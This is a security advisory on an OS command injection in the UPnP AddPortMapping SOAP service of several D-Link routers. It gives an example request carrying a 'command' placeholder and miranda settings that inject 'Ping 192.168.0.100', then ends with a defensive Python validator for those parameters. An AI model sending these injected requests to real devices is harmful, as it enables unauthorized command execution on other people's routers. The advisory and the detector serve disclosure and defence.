Release date:
Updated on:
Affected Systems:
D-Link DIR-300
D-Link DIR-600 2.12b02
D-Link DIR-645
D-Link DIR-865L 1.05b03
D-Link DIR-845 1.01b02
Description:
--------------------------------------------------------------------------------
Bugtraq id: 61005
D-Link is a world-renowned provider of network devices and solutions. Its products include a variety of router devices.
Multiple D-Link products are affected by a command injection vulnerability that allows attackers to execute arbitrary commands in the context of the affected device. Affected devices include:
DIR-300 rev B running firmware 2.14b01
DIR-600 running firmware running B01
DIR-645 running firmware 1.04b01
DIR-845 running firmware 1.01b02
DIR-865 running firmware 1.05b03
<* Source: m-1-k-3
Link: http://xforce.iss.net/xforce/xfdb/85461
http://packetstormsecurity.com/files/122307/D-Link-UPnP-OS-Command-Injection.html
*>
Test method:
--------------------------------------------------------------------------------
Alert
The following procedures (methods) may be offensive and are intended only for security research and teaching. Use them at your own risk!
=> Parameter: NewInternalClient, NewExternalPort, NewInternalPort
Example Request:
POST /soap.cgi?service=WANIPConn1 HTTP/1.1
SOAPAction: "urn:schemas-upnp-org:service:WANIPConnection:1#AddPortMapping"
Host: 10.8.28.htm: 49152
Content-Type: text/xml
Content-Length: 649
<?xml version="1.0"?>
<SOAP-ENV:Envelope xmlns:SOAP-ENV="http://schemas.xmlsoap.org/soap/envelope" SOAP-ENV:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/">
<SOAP-ENV:Body>
<m:AddPortMapping xmlns:m="urn:schemas-upnp-org:service:WANIPConnection:1">
<NewPortMappingDescription></NewPortMappingDescription>
<NewLeaseDuration></NewLeaseDuration>
<NewInternalClient>'command'</NewInternalClient>
<NewEnabled>1</NewEnabled>
<NewExternalPort>634</NewExternalPort>
<NewRemoteHost></NewRemoteHost>
<NewProtocol>TCP</NewProtocol>
<NewInternalPort>45</NewInternalPort>
</m:AddPortMapping>
</SOAP-ENV:Body>
</SOAP-ENV:Envelope>
You could use miranda for your own testing:
* NewInternalClient
Required argument:
Argument Name: NewInternalClient
Data Type: string
Allowed Values: []
Set NewInternalClient value to: 'Ping 192.168.0.100'
* NewExternalPort
Required argument:
Argument Name: NewExternalPort
Data Type: ui2
Allowed Values: []
Set NewExternalPort value to: 'Ping 192.168.0.100'
* NewInternalPort
Required argument:
Argument Name: NewInternalPort
Data Type: ui2
Allowed Values: []
Set NewInternalPort value to: 'Ping 192.168.0.100'
Screenshot: http://www.s3cur1ty.de/sites/www.s3cur1ty.de/files/images/dir-865-v105-shell.png
Suggestion:
--------------------------------------------------------------------------------
Vendor patch:
D-Link
------
The vendor has released a patch to fix this security problem. Please download it from the vendor's homepage:
http://www.dlink.com/
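Detection example (added here, not part of the original advisory and not D-Link code): a check that a proxy or sensor in front of unpatched devices could run on AddPortMapping requests, rejecting any of the three parameters named above that does not match its expected type. The function name and the sample requests are constructed for illustration; treating NewInternalClient as IPv4-only is an assumption of this example.

```python
import ipaddress
import xml.etree.ElementTree as ET

# Arguments the advisory names as injectable. UPnP types the ports as ui2;
# NewInternalClient is typed "string" but is assumed here to hold an IPv4 address.
UI2_ARGS = ("NewExternalPort", "NewInternalPort")

def check_add_port_mapping(soap_body: str) -> list[str]:
    """Return findings for one AddPortMapping SOAP body (empty list = clean)."""
    if "<!DOCTYPE" in soap_body or "<!ENTITY" in soap_body:
        return ["DTD or entity declaration in SOAP body"]  # refuse to parse these
    try:
        root = ET.fromstring(soap_body)
    except ET.ParseError as exc:
        return [f"unparseable SOAP body: {exc}"]
    # Map local element name -> text, ignoring namespace prefixes.
    args = {el.tag.rsplit("}", 1)[-1]: (el.text or "").strip() for el in root.iter()}
    if "AddPortMapping" not in args:
        return []  # not the action this check covers
    findings = []
    client = args.get("NewInternalClient", "")
    try:
        ipaddress.IPv4Address(client)
    except ValueError:
        findings.append(f"NewInternalClient is not an IPv4 address: {client!r}")
    for name in UI2_ARGS:
        value = args.get(name, "")
        # ui2 = unsigned 16-bit integer written in ASCII decimal digits.
        ok = value.isascii() and value.isdigit() and len(value) <= 5 and int(value) <= 0xFFFF
        if not ok:
            findings.append(f"{name} is not a ui2 value: {value!r}")
    return findings

# Constructed sample requests (not captured traffic).
TEMPLATE = (
    '<?xml version="1.0"?>'
    '<s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope">'
    '<s:Body><m:AddPortMapping xmlns:m="urn:schemas-upnp-org:service:WANIPConnection:1">'
    "<NewInternalClient>{client}</NewInternalClient>"
    "<NewExternalPort>{ext}</NewExternalPort>"
    "<NewInternalPort>{internal}</NewInternalPort>"
    "</m:AddPortMapping></s:Body></s:Envelope>"
)
BENIGN = TEMPLATE.format(client="192.168.0.100", ext="634", internal="45")
SUSPECT_CLIENT = TEMPLATE.format(client="'command'", ext="634", internal="45")
SUSPECT_PORT = TEMPLATE.format(client="192.168.0.100", ext="Ping 192.168.0.100", internal="45")

if __name__ == "__main__":
    for label, body in (("benign", BENIGN), ("client", SUSPECT_CLIENT), ("port", SUSPECT_PORT)):
        print(label, check_add_port_mapping(body))
```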